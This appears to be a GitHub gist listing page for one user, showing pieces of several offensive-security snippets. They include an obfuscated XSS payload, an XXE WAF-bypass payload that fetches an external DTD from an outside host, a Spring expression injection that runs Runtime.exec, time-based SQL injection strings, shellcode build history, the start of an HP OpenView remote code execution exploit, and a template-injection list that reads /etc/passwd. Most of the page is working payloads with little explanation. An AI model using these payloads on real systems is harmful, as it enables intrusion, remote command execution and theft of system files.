nani1337
nani1337
/ dirsearch.sh
Created
June 15, 2019 08:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #dirsearchem | |
| #$1 box name | |
| #$2 URL (check for Domain, HTTPS, port first) | |
| clear | |
| date | |
| echo "Running dirsearch on $1 $2" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://jsfiddle.net/3g8yehpz/ | |
| <script>throw/a/,a=URL+0,g=alert,onerror=eval,{lineNumber:1,columnNumber:1,fileName:0,message:0+/1/g+a[12]+[1337,331,337]+a[13]}</script> |
nani1337
/ HP Fortify with ASP.NET
Created
April 12, 2019 09:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Open the Visual Studio Command Prompt. | |
| (The Visual Studio Command Prompt loads the necessary environment variables required for the proper | |
| functioning of the Visual Studio command line tools.) | |
| You can open the VS command prompt by navigating to Start --> All Programs --> Microsoft Visual Studio 2010 --> Visual Studio Tools | |
| --> Visual Studio 2xxx Developer Command Prompt. | |
| 2. Please make sure you are able to build your solution successfully by running the following command: | |
| devenv Sample.sln /Rebuild Debug |
nani1337
/ xxe waf bypass
Created
April 3, 2019 06:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --------------------------- | |
| Inside SOAP body | |
| --------------------------- | |
| <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> | |
| --------------------------- | |
| Untested - WAF Bypass | |
| --------------------------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| My input of abc${12*12}abc was reflected as abc144abc. Then I wanted to perform a simple id and get the result on screen. I proceeded with the following payload: | |
| URI: /BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec('id')} | |
| Payload: ${T(java.lang.Runtime).getRuntime().exec('id')} | |
| After going through some Java classes I stumbled upon the following: | |
| java.lang.Character.toString(105) | |
| -> prints the characer 'i' |
nani1337
/ Manul Sqli
Last active
August 7, 2022 09:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sleep/*f*/(10)&new_tags[]=3&menu_id=1111 | |
| item_id=1111-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0) | |
| MID(0x352e362e33332d6c6f67,1,1)//LIKE//5 (hex == @@version) | |
| "')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/%23" | |
| if(mid(@@version,1,1)=5 which returns a 200 ok message. | |
| If changed for if(mid(@@version,1,1)=4 the server gives a 500 or 504 error, | |
| bc*/OR/*dahdshka*/2/*sd*/LIKE/*da*/"2"/**/%23 translates to: 2 OR 2=2%23 |
nani1337
/ custom shell code for downoading web page
Created
February 4, 2019 18:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 391 nano custom_shell_storm.c | |
| 392 gcc -fno-stack-proctector -z execstack custom_shell_storm.c -o custom_shell_storm | |
| 393 gcc -fno-stack-protector -z execstack custom_shell_storm.c -o custom_shell_storm | |
| 394 ./custom_shell_storm | |
| 395 gdb ./custom_shell_storm -q | |
| 396 nano fix_shell.nasm | |
| 397 cat fix_shell.nasm | cut -f2 | |
| 398 cat fix_shell.nasm | cut -f2 >final.nasm | |
| 399 cat final.nasm | |
| 400 nano final.nasm |
nani1337
/ hp-openview-exploit.py
Created
January 24, 2019 14:46
— forked from mgeeky/hp-openview-exploit.py
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # HP OpenView NNM B.07.50 Remote Code Execution exploit | |
| # by Mariusz B. / mgeeky, 17' | |
| import struct | |
| import socket | |
| HOST = '192.168.XXX.YYY' | |
| PORT = 7510 |
nani1337
/ ascii-shellcode-encoder.py
Created
January 24, 2019 14:42
— forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
nani1337
/ Server-Side-Template-Injection-Payloads.txt
Created
January 22, 2019 06:05
— forked from mgeeky/Server-Side-Template-Injection-Payloads.txt
A collection of Client/Server -Side Template Injection payloads to be used in Burp's Intruder. Look for evaluted value: 1868686868 (=36692*50929), remove the first line.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### LOOK FOR 1868686868 | |
| <%= 36692 * 50929 %> | |
| <%= File.open('/etc/passwd').read %> | |
| ${36692*50929} | |
| 18686{*xxxxxxxxxx*}86868 | |
| ${"18686".join("86868")} | |
| ${36692*'50929'} | |
| ${{36692*50929}} | |
| ${{36692*'50929'}} | |
| {{36692*'50929'}} |